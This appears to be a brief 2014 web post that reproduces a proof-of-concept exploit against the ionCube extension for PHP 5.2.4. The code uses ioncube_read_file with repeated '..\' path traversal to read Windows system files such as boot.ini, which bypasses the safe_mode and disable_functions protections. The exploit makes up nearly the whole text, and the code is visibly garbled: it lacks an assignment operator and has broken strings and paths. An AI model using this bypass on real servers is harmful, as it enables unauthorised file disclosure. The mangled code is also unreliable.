octubre 15, 2014

PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass


<!--if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!"); $path str_repeat("..\", 20);
$MyBoot_readfile = readfile($path."
windowssystem.ini"); #just to be sure that I set correctely disable_function :)
$MyBoot_ioncube = ioncube_read_file($path."
boot.ini");
echo $MyBoot_readfile;
echo "
  
ionCube output:
  
";
echo $MyBoot_ioncube;
-->